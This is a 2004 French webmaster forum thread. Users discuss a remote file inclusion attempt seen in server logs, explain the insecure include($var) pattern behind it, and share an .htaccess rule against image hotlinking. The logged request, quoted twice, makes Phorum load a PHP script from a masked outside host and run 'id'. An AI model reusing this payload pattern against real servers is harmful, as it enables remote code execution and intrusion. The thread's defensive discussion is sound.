pirate ?

jeroen · 25 Juin 2004

J'ai vu passer ça dans mes logs :

phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://www.**********.br/replace.php?&cmd=id

Heureusement j'ai modifié le script initial (phorum) et y'a eu une erreur 404.

Vous avez une idée de ce que ça pouvait être ?
Remarque : j'ai masqué l'adresse.

Nivek · 25 Juin 2004

Salut,

J'ai un probleme similaire, Ce soir j'ai vue un referant venant d'un forum, je suis allé voir :
-http://forum.alloforum.com/voir.php?id=3071&msg=169777
ET LA SURPRISE !

Des photos de mon site (profil) sont sur le forum.
Le pire, c'est qu'il les à pas copiées, il les télécharge à partir de mon site !!

ça me fou la haine se genre de webmaster :evil:

sami_m · 25 Juin 2004

J'ai vu passer ça dans mes logs :

phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://www.**********.br/replace.php?&cmd=id

Heureusement j'ai modifié le script initial (phorum) et y'a eu une erreur 404.

Vous avez une idée de ce que ça pouvait être ?
Remarque : j'ai masqué l'adresse.

ça semble bien être une tentative d’attaque, il y’a une faille dans une version de phorum qui permet d’inclure un script php venant d'un autre serveur et de le lancer.
fait une recherche sur « phorum/plugin/replace/plugin.php?PHORUM[settings_dir]= » et tu aura plus de détails.

Posté le: Ven Juin 25, 2004 0:52 Sujet du message:

--------------------------------------------------------------------------------

Salut,

J'ai un probleme similaire, Ce soir j'ai vue un referant venant d'un forum, je suis allé voir :
-http://forum.alloforum.com/voir.php?id=3071&msg=169777
ET LA SURPRISE !

Des photos de mon site (profil) sont sur le forum.
Le pire, c'est qu'il les à pas copiées, il les télécharge à partir de mon site !!

ça me fou la haine se genre de webmaster

J’ai eu le même problème que toi, j’ai du installer un script pour empêcher les webmasters indélicats d’afficher mes images sur leurs sites, ça s’appelle du « anti bandwidth theft », ça marche pas à 100% ça dépend du type du browser mais c’est efficace pour les décourager ; je crois qu’il y’a moyen de le faire aussi avec un rewrite

mahefarivony · 25 Juin 2004

Nivek a dit:
Salut,

J'ai un probleme similaire, Ce soir j'ai vue un referant venant d'un forum, je suis allé voir :
-http://forum.alloforum.com/voir.php?id=3071&msg=169777
ET LA SURPRISE !

Des photos de mon site (profil) sont sur le forum.
Le pire, c'est qu'il les à pas copiées, il les télécharge à partir de mon site !!

ça me fou la haine se genre de webmaster :evil:

ca se regle facilement ce probleme : y a un moyen avec le .htaccess de lui "dire" que si on est pas sur ton domaine, bin il affiche pas.

et mets un (c) sur chacune de tes photos.. C'est un peu superflu dans la mesure ou tes photos sont automatiquement protégées par le droit d'auteur mais une petite piqure de rappel ca peut pas faire de mal non plus.

herveG · 25 Juin 2004

un "c" et l adresse de ton site en petit......

jeroen · 25 Juin 2004

sami_m a dit:
fait une recherche sur « phorum/plugin/replace/plugin.php?PHORUM[settings_dir]= » et tu aura plus de détails.

Effectivement, j'ai trouve Faille de securite sur phorum

Merci

WebRankInfo · 25 Juin 2004

ce genre d'attaque, j'en ai plusieurs par semaine :-(

Nivek · 25 Juin 2004

mahefarivony a dit:
ca se regle facilement ce probleme : y a un moyen avec le .htaccess de lui "dire" que si on est pas sur ton domaine, bin il affiche pas.

Comment on fait ? J'y connais pas grand chose sur .htaccess

EasyExpat · 25 Juin 2004

Nivek a dit:
Comment on fait ? J'y connais pas grand chose sur .htaccess

On met ca:

Code:

# to prevent people to download images

RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^http://(www\.)?monsite.com/.*$ [NC]
RewriteRule \.(gif|png|jpe?g)$ - [F]

En parlant des attaques de hacker qui essayent d'ouvrir des sessions de commandes, j'en ai eu une assez grave en debut de semaine de Infektion Group (il suffira de chercher sur GG pour avoir un exemple de ce qu'ils font).

Bref, le principe est décrit plus haut. Si vous incluez directement les variable tel que:
-www.monsite.com?var=toto.php

puis dans le script:
include($var);

la porte est grande ouverte, car imaginez qu'au lieu de passer toto.php, le hacker passer une adresse url... :-?

Bref, voila pour la petite histoire... Je sais que c'est la rancon du succes, mais je suis tout de meme etonné que WRI ait des attaques plusieurs fois par semaine... c'est a croire que certains n'ont que ca a faire... :evil:

EasyExpat · 25 Juin 2004

Tenez, il y a la un article bien intéressant qui vient juste de m'arriver:
http://www.lexpansion.com/art/2486.76841.0.html

sami_m · 25 Juin 2004

pour la question des images, un truc "rigolo" à faire c’est de remplacer les images que tenteraient d’utiliser les autres sites par une image sur laquelle il y’a l’URL et une pub de ton propre site, l’arroseur arrosé

hifuga · 28 Juin 2004

Nivek a dit:
Salut,

J'ai un probleme similaire, Ce soir j'ai vue un referant venant d'un forum, je suis allé voir :
-http://forum.alloforum.com/voir.php?id=3071&msg=169777
ET LA SURPRISE !

Des photos de mon site (profil) sont sur le forum.
Le pire, c'est qu'il les à pas copiées, il les télécharge à partir de mon site !!

ça me fou la haine se genre de webmaster :evil:

Bizarrement moi aussi j'ai 32 entrées sur mon site à partir d'alloforum mais je n'arrive pas a voir de quelle page exactement ça vient,

ça m'affiche que ça :

-http://forum.alloforum.com/voir.php

Quentin_ · 29 Juin 2004

j'ai de plus en plus souvent des référants tres louches... des pages qui éxiste pas... ou des forums ou je vois mon url nul part... :/